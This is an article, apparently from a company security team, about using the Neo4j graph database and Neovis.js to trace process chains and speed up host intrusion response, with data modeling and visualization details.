How Graph Databases Revolutionize Host Security Incident Response

Exploration Background

As HuoLala expands across multiple clouds, security incident response requires operators to switch clouds and deal with opaque security policies that cannot be customized. To reduce multi‑cloud operational costs and enable host‑level data to interoperate with other security products, a custom host‑security HIDS was built. In addition to detection features, the team explored mechanisms for tracing attack chains to achieve full intrusion awareness and improve MTTR.

1.1 Emergency Tracing Pain Points

Host security data (process creation, file activity, network connections, login logs) is typically stored in MySQL, Elasticsearch, and Hive. Current detection focuses on single‑point alerts; comprehensive analysis often requires manually aggregating logs across dimensions, using Kibana dashboards to switch between process, network, DNS, file, and login data. This manual inspection is slow (minutes to hours) and prone to errors. Moreover, large‑scale joins across traditional databases become infeasible, limiting real‑time response.

1.2 Emergency Response Requirements

Quickly assess whether an alert indicates a real attack.

Reconstruct the attacker’s intrusion chain to pinpoint cause and decide on remediation.

Evaluate impact and discover additional unknown threats through correlation.

To meet these needs, all host‑level data (processes, network, files) should be stored uniformly in a graph database, which naturally models relationships and supports comprehensive reasoning.

2 Graph Database Research

Open‑source graph databases evaluated include Neo4j, JanusGraph, HugeGraph, and NebulaGraph. Neo4j was chosen for its rapid support and visualization capabilities.

2.1 Neo4j Overview

Neo4j is a high‑performance NoSQL graph database that stores data as nodes and relationships. Nodes have labels and properties; relationships are directed, typed, and can also hold properties.

2.2 Visualization with Neovis.js

Neovis.js is a JavaScript library that connects to Neo4j and renders interactive graph visualizations. It allows custom UI design, URL‑based trace links, easy integration with existing tools, and iterative feedback‑driven development.

2.3 Cypher Query Language

Cypher is Neo4j’s declarative query language. Basic syntax includes MATCH for pattern matching, WHERE for filtering, and RETURN for results. Example:

MATCH (n)-[r*]-(m) WHERE n.pid='1788' AND n.ip='10.xx.xx.16' RETURN n, r, m

3 Graph Database Application

3.1 Data Processing Flow

Security alerts are enriched with host‑level data and ingested into Neo4j. The data volume remains manageable.

3.2 Data Modeling

Node types: host, warning, process, file, network. Relationship types: create, trigger, external‑connect, open, etc. Example relationships:

process‑[create]‑>process (parent‑child)

process‑[open]‑>file

process‑[connect]‑>network

process‑[create]‑>warning

3.3 Process Chain Parent‑Child Relationships

Thread groups share a TGID; process groups share a PGID; sessions group multiple process groups. By correlating pid, ppid, pgid, and sid, the system can reconstruct parent‑child hierarchies and visualize them as directed graphs.

4 Host Security Effects

4.1 Push Graph Data Trace Chains

Security alerts are sent to Feishu groups via a bot, with URLs linking to the Neo4j visualization of the trace chain. Sample alerts (command injection, reverse shell) include detailed process information and trace‑chain URLs.

4.2 Daily Graph Queries

Operators can query specific nodes by pid and IP using Cypher, retrieving the full sub‑graph of related activities.

4.3 Visualization Features

Hover to view node details; mouse wheel to zoom.

Drag nodes with inertia; “Stabilize” button to fix layout.

5 Summary and Outlook

The security team’s graph‑database practice has demonstrated significant improvements in incident‑response efficiency during drills. Future work includes extending graph‑based tracing to EDR, deep‑defense, and data‑security products, aiming to provide a layered, comprehensive security view from high‑level attack paths down to process‑level alerts.